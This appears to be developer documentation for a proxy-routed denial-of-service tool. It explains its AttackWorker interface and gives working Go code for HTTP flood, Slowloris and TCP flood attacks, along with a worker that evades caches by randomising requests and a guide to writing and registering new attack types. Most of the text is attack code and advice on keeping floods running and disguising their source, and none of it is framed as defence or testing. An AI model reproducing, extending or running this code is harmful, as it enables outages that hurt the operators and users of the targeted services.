The AttackWorker interface defines the contract for implementing attack methods. Each attack type (HTTP flood, TCP flood, Slowloris, etc.) implements this interface to integrate with the engine.
Interface Definition
type AttackWorker interface {
	// Fire sends a single payload for the given params using the provided proxy and user agent.
	// It should return quickly and not block the caller; the engine dispatches calls concurrently.
	// The log channel can be used to send individual attack logs.
	Fire(ctx context.Context, params AttackParams, proxy Proxy, userAgent string, logCh chan<- AttackStats) error
}
Fire Method
Fire(
	ctx context.Context,
	params AttackParams,
	proxy Proxy,
	userAgent string,
	logCh chan<- AttackStats,
) error
Sends a single attack payload. Called concurrently by the engine for each packet.
Parameters
ctx: cancellation context; workers must stop promptly once it is done.
params: attack configuration (target, packet size, packet delay, verbosity).
proxy: proxy to route traffic through; may be empty (proxy.Host == "").
userAgent: user agent string to set on requests; may be empty.
logCh: channel for sending individual attack log entries.
Return Value
Returns an error if the attack failed. In practice, current implementations return nil even on failure so that a single failed packet does not disrupt the attack flow.
Implementation Requirements
Performance Critical: Fire() is called at high frequency (potentially thousands of times per second). It must:
Return quickly (typically < 10ms)
Not block on I/O - use short timeouts
Handle errors gracefully without panicking
The engine dispatches Fire() calls in goroutines, so blocking briefly is acceptable. However, long-running operations should spawn their own goroutines (see Slowloris example).
Built-in Implementations
HTTP Flood Worker
Location: internal/attacks/http/flood.go
type floodWorker struct{}

func NewFloodWorker() *floodWorker { return &floodWorker{} }
Strategy:
Sends GET or POST requests with random payloads
Prefers POST for larger packet sizes (> 512 bytes)
Uses DialedHTTPClient() with proxy support
Discards response body to avoid blocking
Code Example:
func (w *floodWorker) Fire(ctx context.Context, params core.AttackParams, p core.Proxy, ua string, logCh chan<- core.AttackStats) error {
	u := params.TargetNode.ToURL()
	target := u.String()
	client := netutil.DialedHTTPClient(p, 5*time.Second, 3)
	isGet := params.PacketSize <= 512 && rand.Intn(2) == 0
	payload := randomString(params.PacketSize)

	var req *http.Request
	var err error
	if isGet {
		req, err = http.NewRequestWithContext(ctx, http.MethodGet, target+"/"+payload, nil)
	} else {
		req, err = http.NewRequestWithContext(ctx, http.MethodPost, target, io.NopCloser(bytes.NewBufferString(payload)))
	}
	if err != nil {
		return err
	}
	if ua != "" {
		req.Header.Set("User-Agent", ua)
	}

	resp, err := client.Do(req)
	if err == nil && resp != nil {
		io.Copy(io.Discard, resp.Body)
		resp.Body.Close()
		core.SendAttackLogIfVerbose(logCh, p, params.Target, params.Verbose)
	}
	return nil
}
HTTP Bypass Worker
Location: internal/attacks/http/bypass.go
type bypassWorker struct{}

func NewBypassWorker() *bypassWorker { return &bypassWorker{} }
Strategy:
Randomizes request paths and query parameters to evade caching
Sets realistic browser headers (Referer, Cookie, etc.)
Mimics resource requests (.js, .css, images)
Uses DialedMimicHTTPClient() with browser-like behavior
Key Features:
80% GET, 20% POST distribution
Random paths like abc123/xyz.js or random.css
Cache-busting query parameters
Realistic referers (same origin or popular sites)
HTTP Slowloris Worker
Location: internal/attacks/http/slowloris.go
type slowlorisWorker struct{}

func NewSlowlorisWorker() *slowlorisWorker { return &slowlorisWorker{} }
Strategy:
Opens raw TCP/TLS connection via SOCKS proxy
Sends HTTP headers slowly (one per PacketDelay)
Never completes the request to keep connection open
Periodically sends keep-alive headers
Code Pattern:
func (w *slowlorisWorker) Fire(ctx context.Context, params core.AttackParams, p core.Proxy, ua string, logCh chan<- core.AttackStats) error {
	// ... establish connection ...
	conn, err := netutil.DialedTCPClient(ctx, scheme, host, portNum, pptr)
	if err != nil {
		return err
	}
	core.SendAttackLogIfVerbose(logCh, p, params.Target, params.Verbose)

	// Spawn goroutine to dribble headers slowly
	go func(c net.Conn) {
		defer c.Close()
		bw := bufio.NewWriter(c)
		fmt.Fprintf(bw, "GET / HTTP/1.1\r\n")

		// Send headers with delay
		headers := []string{
			"Host: " + host,
			"User-Agent: " + pickUA(ua),
			"Accept: */*",
			"Connection: keep-alive",
		}
		for _, h := range headers {
			bw.WriteString(h + "\r\n")
			bw.Flush()
			select {
			case <-ctx.Done():
				return
			case <-time.After(params.PacketDelay):
			}
		}

		// Keep connection alive indefinitely
		ticker := time.NewTicker(params.PacketDelay)
		defer ticker.Stop()
		for {
			select {
			case <-ctx.Done():
				return
			case <-ticker.C:
				bw.WriteString("X-a: b\r\n")
				bw.Flush()
			}
		}
	}(conn)
	return nil
}
Slowloris returns immediately after spawning the goroutine. The connection lifecycle is managed by the spawned goroutine, which respects ctx.Done().
TCP Flood Worker
Location: internal/attacks/tcp/flood.go
type floodWorker struct{}

func NewFloodWorker() *floodWorker { return &floodWorker{} }
Strategy:
Opens raw TCP connection (via SOCKS proxy if available)
Sends random bytes (crypto/rand)
Sends multiple bursts (1-3) per fire
Uses 2-second write deadline
Code Example:
func (w *floodWorker) Fire(ctx context.Context, params core.AttackParams, p core.Proxy, ua string, logCh chan<- core.AttackStats) error {
	tn := params.TargetNode
	host := tn.Hostname()
	port := tn.PortNum()

	var pptr *core.Proxy
	if p.Host != "" {
		pptr = &p
	}
	conn, err := netutil.DialedTCPClient(ctx, "tcp", host, port, pptr)
	if err != nil {
		return nil
	}
	defer conn.Close()
	core.SendAttackLogIfVerbose(logCh, p, params.Target, params.Verbose)

	size := params.PacketSize
	if size <= 0 {
		size = 512
	}
	buf := make([]byte, size)
	rand.Read(buf)
	conn.SetWriteDeadline(time.Now().Add(2 * time.Second))
	conn.Write(buf)

	// Send multiple bursts
	bursts := minInt(3, 1+randIntn(3))
	for i := 0; i < bursts; i++ {
		rand.Read(buf)
		conn.Write(buf)
	}
	return nil
}
Minecraft Ping Worker
Location: internal/attacks/game/minecraft_ping.go
type mcPingWorker struct{}

func NewPingWorker() *mcPingWorker { return &mcPingWorker{} }
Strategy:
Sends Minecraft protocol handshake packet
Follows with status request (packet ID 0x00)
Reads partial response to prevent buffer buildup
Defaults to port 25565 if no port specified
Protocol Details:
// Handshake packet structure
Packet ID:        0x00
Protocol Version: VarInt (754 for 1.16+)
Server Address:   String (host)
Server Port:      Unsigned Short (big-endian)
Next State:       VarInt (1 = status)

// Status request
Packet ID: 0x00
Length:    1
Implementing a Custom Worker
Step 1: Define the Worker Type
package myattack

import (
	"context"

	core "github.com/sammwyy/mikumikubeam/internal/engine"
)

type customWorker struct {
	// Optional: store configuration
}

func NewCustomWorker() *customWorker {
	return &customWorker{}
}
Step 2: Implement the Fire Method
func (w *customWorker) Fire(
	ctx context.Context,
	params core.AttackParams,
	proxy core.Proxy,
	userAgent string,
	logCh chan<- core.AttackStats,
) error {
	// 1. Extract target info
	target := params.TargetNode
	host := target.Hostname()
	port := target.PortNum()

	// 2. Establish connection (with proxy if available)
	var pptr *core.Proxy
	if proxy.Host != "" {
		pptr = &proxy
	}
	conn, err := netutil.DialedTCPClient(ctx, "tcp", host, port, pptr)
	if err != nil {
		return nil // Don't disrupt attack flow
	}
	defer conn.Close()

	// 3. Send log if verbose
	core.SendAttackLogIfVerbose(logCh, proxy, params.Target, params.Verbose)

	// 4. Send payload
	payload := buildPayload(params.PacketSize)
	conn.SetWriteDeadline(time.Now().Add(3 * time.Second))
	conn.Write(payload)

	// 5. Optionally read response
	buf := make([]byte, 256)
	conn.Read(buf)
	return nil
}
Step 3: Register with Engine
const AttackCustom AttackKind = "custom_attack"

registry := engine.NewRegistry()
registry.Register(AttackCustom, myattack.NewCustomWorker())
eng := engine.NewEngine(*registry)
Best Practices
Return nil on most errors to avoid disrupting the attack flow
Only return errors for critical issues (e.g., invalid parameters)
Log errors to logCh if verbose mode is enabled
Always respect ctx.Done() in long-running operations
Pass ctx to all network calls (http.NewRequestWithContext, netutil.DialedTCPClient)
Use select statements when spawning goroutines:
select {
case <-ctx.Done():
	return
case <-time.After(delay):
	// Continue
}
Check if proxy.Host is empty before using
Pass nil to netutil functions if no proxy:
var pptr *core.Proxy
if proxy.Host != "" {
	pptr = &proxy
}
conn, err := netutil.DialedTCPClient(ctx, "tcp", host, port, pptr)
Always set reasonable timeouts on network operations
Typical values: 3-6 seconds for HTTP, 2-3 seconds for TCP
Use SetDeadline, SetReadDeadline, SetWriteDeadline for raw connections
Always defer Close() on connections
Discard HTTP response bodies to avoid memory leaks:
resp, err := client.Do(req)
if err == nil && resp != nil {
	io.Copy(io.Discard, resp.Body)
	resp.Body.Close()
}
Use SendAttackLogIfVerbose() helper to respect verbose flag
Only send logs after successful operations
Use non-blocking sends (helper handles this automatically)
Testing Your Worker
func TestCustomWorker(t *testing.T) {
	worker := NewCustomWorker()
	ctx := context.Background()
	params := core.AttackParams{
		Target:     "localhost:8080",
		TargetNode: parseTarget("localhost:8080"),
		PacketSize: 1024,
		Verbose:    true,
	}
	logCh := make(chan core.AttackStats, 10)
	proxy := core.Proxy{} // No proxy

	err := worker.Fire(ctx, params, proxy, "Test-Agent", logCh)
	assert.NoError(t, err)

	// Check log was sent
	select {
	case stat := <-logCh:
		assert.Contains(t, stat.Log, "Miku miku beam")
	case <-time.After(1 * time.Second):
		t.Fatal("No log received")
	}
}
See Also